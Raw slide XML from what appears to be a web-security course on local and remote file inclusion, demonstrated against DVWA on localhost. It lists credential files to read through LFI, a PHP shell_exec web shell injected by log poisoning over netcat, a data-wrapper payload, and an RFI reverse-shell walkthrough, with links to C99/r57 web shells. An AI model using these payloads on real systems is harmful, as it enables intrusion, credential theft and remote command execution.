    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2177225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0D427-178B-4B70-8D81-D9B41E5E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File Inclusion Vulnerabilities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02A67-BD02-4A2B-8655-14A6785F6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Vulnerabilities that allow attackers to execute the content of a file on the web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Two types of File Inclusion Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Local File Inclusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Remote File Inclusion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55149-411A-4788-977B-C8CC34681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89"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2804969" y="4190229"/>
            <a:ext cx="4114286" cy="248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9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0F001-87C5-E221-DF1C-E8A875C87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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lfi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D44DF-3F2B-3A70-42A7-E65E363FB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6303774" cy="402336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http://127.0.0.1:42001/vulnerabilities/fi/?pages=/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://127.0.0.1:42001/vulnerabilities/fi/?pages=/proc/version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/issue </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– /proc/version </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/profile </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/passwd </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/passwd </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/shadow </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– /root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bash_history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7B310-6C9F-9276-3A71-790843806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81900" y="2286000"/>
            <a:ext cx="3162300" cy="402336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– /var/log/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dmessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– /var/mail/root </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– /var/spool/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/crontabs/root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>–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fstab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>–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master.passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>–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resolv.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>–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sudoers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>–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sysctl.conf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21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9136-06DA-4C9F-E69A-34416278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Tools: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Lfi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-space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9610A-0FD0-CCF7-237D-31705B2F9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git clone https://github.com/capture0x/Lfi-Space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Instalasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$ python –m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>venv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lfispace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-env</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$ source </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lfispace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-env/bin/activate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$ pip install –r </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>requirements.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$ vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>url.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ganti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> http://127.0.0.1:42001/vulnerabilities/fi/?page=)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$ python </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lfi.py</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> dictionary: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danielmiessler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SecLists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/blob/master/Fuzzing/LFI/LFI-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Jhaddix.txt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0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BC283-52FB-7CED-18C0-C81EDA9D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4C835-B5A0-AB58-4E9E-06BA2066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 locate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> | grep fi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dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/vulnerabilities/fi/source/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>high.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p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dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/vulnerabilities/fi/source/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>impossible.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p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dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/vulnerabilities/fi/source/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>low.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p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dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/vulnerabilities/fi/source/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>medium.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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697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B3B9E-3297-4EFA-90C2-1AE5135A6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do we execute code that does not exist?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E2454-E3F4-40AE-9767-842B727B8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Contaminate log files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Connect to the webserver using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Send the following line:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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echo '&lt;pre&gt;' .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shell_exec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($_GET['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']) . '&lt;/pre&gt;';?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Execute the log file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Use PHP Wrappers</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" baseline="30000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Format the input parameter like the following line:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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data:text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/plain,&lt;?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echo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shell_exec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(“ls”) ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Fill in the vulnerable parameter with that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58F85-BED0-4A4F-9530-8C9C35DE5BAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="314632" y="6369764"/>
            <a:ext cx="3164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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. https://www.php.net/manual/en/wrappers.data.php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82790-DF5C-4455-BE68-48B0A8F22D92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5461708" y="4625982"/>
            <a:ext cx="585926" cy="40837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FACE1-B31F-4151-A8FA-A7A5589C5B22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7378356" y="4840684"/>
            <a:ext cx="21226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Replace this with any command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BFE6F6-A565-4008-B7E8-FE282008205E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6047634" y="4830169"/>
            <a:ext cx="1330722" cy="13362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5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AAB7B-6F88-46EC-84E4-5BA5280A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AB726-BF48-4312-860A-F1F761AE6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/>
              <a:t>Day 1:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" b="1"/>
              <a:t>Recent Incidents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" b="1"/>
              <a:t>Regulations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" b="1"/>
              <a:t>OWASP Top 10 &amp; SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" b="1"/>
              <a:t>Directory Traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" b="1"/>
              <a:t>File Inclusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Day 2:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Session Hijacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Cross Site Scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Cross Site Request Forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Man-in-the-middle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Man-in-the-Browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Insecure Direct Object Reference</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="819379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BE9D-2B60-29CD-8911-0E02DE74C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poisoning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E7692-6BDA-1F8A-B5C1-897631E66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nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 127.0.0.1 42001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> echo '&lt;pre&gt;' . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shell_exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($_GET['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>']) . '&lt;/pre&gt;’;?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>$ http://127.0.0.1:42001/vulnerabilities/fi/?page=/var/log/dvwa/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>access.log&amp;cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=ls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(please check log file path)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890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BDBF-0FFE-4BB2-99C1-805763E6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Remote File Inclusion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A70D-8BC8-40E7-8AFA-3349D1925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Attackers execute a file that does not exist on the webserver</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>PHP must be configured with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" err="1"/>
              <a:t>allow_url_include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> set to “On” </a:t>
            </a:r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0F26B-4C84-4C6F-BB67-F2F05B546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89"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2192408" y="3879510"/>
            <a:ext cx="4114286" cy="248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22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4B20A-B97A-3935-391D-22B51F61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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Remote File Inclusion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66A2A-1C88-9F45-8065-7E0126EF1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  <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://127.0.0.1:42001/vulnerabilities/fi/?pages=https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>its.ac.id</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://127.0.0.1:42001/vulnerabilities/fi/?pages=https://google.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/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963034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3EB8-158D-43FA-4162-40442F8D5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Rfi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &amp; Reverse shell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66F5B-487D-1EE4-7CC6-6ECBD26CE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updatedb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$ locate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shell.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p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webshells</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-reverse-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shell.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$ cp 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webshells</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-reverse-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ~/Desktop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$ cd ~/Desktop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$ python –m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>http.server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –bind 127.0.0.1 9000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169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9C0E-87AD-DF50-097C-2BA80E9F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Rfi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &amp; Reverse shell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CC3FC-1382-0257-DCA4-85C76833E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terminal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nltp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 1234</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Back to browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://127.0.0.1:42001/vulnerabilities/fi/?pages=http://127.0.0.1:9000/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-reverse-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shell.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Back to another </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> terminal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We get a shell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387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29548-9171-4E6C-98F0-658E2BFE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Web Shells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0DEA2-0CBC-411B-ACB8-5D93E9A7F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 malicious script used by an attacker with the intent to escalate and maintain persistent access on an already compromised web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Purposes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Persistent remote access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Privilege escalation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Pivoting and launching attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Turning server to a zombie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="164130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6BE4-D03E-4ACC-92F0-C0FF077E8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C99 Shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2" descr="Mad Irish :: PHP Malware C99 Shell">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7D52B3E-CAB0-42F9-87AA-17BD20727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69" y="1690688"/>
            <a:ext cx="6066454" cy="475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7CCED9-2CC1-DCD8-A194-6513A73C3876}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7386223" y="2543973"/>
            <a:ext cx="416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https://github.com/phpwebshell/c99shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://www.r57shell.net/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>single.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=13</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2289293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59E4F-0927-5A10-81EB-8E290023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shell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C74BC-95CA-9A36-7181-DE1A7E88F053}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1024128" y="3302000"/>
            <a:ext cx="2061972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Web target</a:t>
            </a:r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7F0F4B-CF1C-E193-A12C-BF3D34C86F04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5723128" y="3244334"/>
            <a:ext cx="2061972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Web shell server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DA479-1560-0896-76FB-2287DF86EEB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4191000" y="302260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A0827-AE51-0C01-382B-41032AA75EF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4165860" y="4040664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7E27B4-193B-5D6A-9186-CB3C2E1615CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3086100" y="3429000"/>
            <a:ext cx="2637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3F15D6-93BA-C8D4-E5C5-647D4932D8AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3086100" y="4040664"/>
            <a:ext cx="2637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251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B9639-7CE7-4D87-8FFF-3C0F06A3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File Inclusion Vulnerabilities Prevention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F774E-48E9-4E13-BA93-B9FFBA18F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Disable shell execution-related functions</a:t>
            </a:r>
          </a:p>
          <a:p>
